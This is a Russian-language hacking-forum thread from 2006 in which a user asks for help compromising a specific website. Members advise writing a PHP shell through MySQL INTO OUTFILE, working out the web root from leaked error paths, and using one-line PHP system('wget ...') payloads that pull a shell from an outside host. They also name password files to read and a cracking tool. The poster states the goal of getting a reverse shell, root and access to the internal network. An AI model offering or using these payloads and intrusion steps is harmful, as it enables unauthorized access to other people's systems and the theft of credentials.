Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Помогите залить шелл (https://forum.antichat.xyz/showthread.php?t=24829)

Lya--Lya 03.10.2006 19:03

Помогите залить шелл
 
Есть проблема заливки шелла на один сайт.
Краткая предистрия....
Есть доступ к mysql от туда можно командой " 'SELECT 'злой пхп шелл' FROM таблица WHERE id=строка
into outfile 'путь к файлу' " загрузить данные с таблици в файл скажем /USR/LOCAL/путь где лежит наш сайт/myevilshell.php

и собственно сама проблема: Я нигде немогу узнать полный путь к директории сайта....

Опытные и знающие люди подскажите помогите что делать.


P.S.- подгрузить файл httpd.conf в таблицу мускула из апача прав нехватило

Utochka 03.10.2006 19:13

а там есть какие нить форумы или чаты, можно попробовать через них раскрыть полный путь

blackybr 03.10.2006 19:53

попробуй поискать какие либо баги. все намного было бы легче если была бы не слепая скуль..

Electro 03.10.2006 22:10

Тебе нужно найти только багу а то ничего не сможешь сделать

Lya--Lya 04.10.2006 12:06

Форумов и чатов там нет.
а багу нашел только одну

Warning: require(DB.php) [function.require]: failed to open stream: No such file or directory in /home/http/htdocs/library/includes/config.php on line 2

Fatal error: require() [function.require]: Failed opening required 'DB.php' (include_path='.:/usr/local/include/php/include/libs') in /home/http/htdocs/library/includes/config.php on line 2

может кто скажет чем мне это сможет помочь...??

Qwazar 04.10.2006 12:17

Попробуй загрузи в /home/http/htdocs/library/includes/ авось прокатит.

Ну или в /home/http/htdocs/ или в /home/http/htdocs/library/ .

blackybr 04.10.2006 15:24

имхо /home/http/htdocs/ ..

Lya--Lya 05.10.2006 01:38

Метод научного тыка... перепробовал.... заливал куда мог.... но всеравно не судьба. Может кто знает какойнить скульный запрос который покажет где путь лежит PhpMyadmin ???
тогда можно просто залить в дир майадмина...

Lya--Lya 05.10.2006 19:25

Помогите... выложите пожалуйста ПХП скрипт который делает wget
ато уже сил нет пререписывать символы в шеле чтоб его мускул прохавал нормально....

blackybr 05.10.2006 19:58

<?system("wget http://site.com/shell.php");?>

))

Lya--Lya 05.10.2006 21:28

Спасибки...

Lya--Lya 05.10.2006 21:33

А, как что б загрул в другую директорию... ???

pop_korn 05.10.2006 21:54

<?system("wget http://site.com/shell.php -O /директори/название_файла.php");?>

r0 05.10.2006 21:54

Загрузи и скопируй

Lya--Lya 11.10.2006 13:08

Подскажите кто знает где хранятся пароли на phpmyadmin если auth_type http

EXSlim 11.10.2006 13:13

Цитата:

Сообщение от Lya--Lya
Подскажите кто знает где хранятся пароли на phpmyadmin

config.inc.php

Lya--Lya 11.10.2006 14:07

Какие файлы нужно просмотреть во FreeBSD для того что б увидеть пароли...
etc/passwd пароли закрыты звездочкой ????

SMiX 11.10.2006 16:43

/etc/master.passwd . Но и там они не в открытом виде :)

Zitt 11.10.2006 23:32

Lya--Lya, для рассшифровки юзай Join The Ripper

Lya--Lya 13.10.2006 14:10

/etc/master.passwd грузить в таблицу не хочет... говорит что нет такого файла...
Может еще чегото есть где могут быть пароли...???

Lya--Lya 13.10.2006 14:35

Цитата:

для рассшифровки юзай Join The Ripper
Что это и где такое взять ?

Lya--Lya 14.10.2006 01:44

ребят.... я зашел в тупик... немогу доломать сайт кто может помочь просьба писать в аску 22554264.....
соррри что не в форуме просто не хочится калечить сайт цель совешенно другая....
Хочется организовать bacconnect с сервака, получить рут, поднять на фрихе впн и прорваться в локалку....

Кста... если не тяжело расскажите как правильно организовать бэкконнект... ато как то чувствую себя ламером

ShAnKaR 14.10.2006 01:49

Цитата:

Сообщение от Lya--Lya
P.S.- подгрузить файл httpd.conf в таблицу мускула из апача прав нехватило

скорее всего и прав на запись не хватит тогда

ShAnKaR 14.10.2006 01:51

Цитата:

Сообщение от Lya--Lya
Подскажите кто знает где хранятся пароли на phpmyadmin если auth_type http

если тип http то пароли могут(могут только а могут и нетолько ) хранится только в бд, а не в конфигах phpmyadmin, еслиб был тип config то в конфиге
P.S. единственное что можешь попробовать это если прав хватит на mysql.user узнать пароли от mysql и попробовать их на другие сервисы, хотя канечно некоторые могут одинаковые пароли иметь и на админку форума и на ftp но это эксклюзив.
PP.S хотя все это уже обжёвывалось раньше , надо наверно antichat в книгах выпускать :)

pop_korn 14.10.2006 02:00

Цитата:

/etc/master.passwd грузить в таблицу не хочет... говорит что нет такого файла...
Может еще чегото есть где могут быть пароли...???
читать его может только root

Цитата:

получить рут
сомневаюсь, что у тебя получится поднять рут на фряхе :)

Цитата:

поднять на фрихе впн и прорваться в локалку....
тем более
нужен рут + хорошее знание ОС

лучше ssh тунель, для него и рут не обязателен )


вообщем для начала получи хотя бы веб шелл

Lya--Lya 17.10.2006 13:37

Цитата:

можешь попробовать это если прав хватит на mysql.user узнать пароли
Где лежит этот файл????


Время: 00:51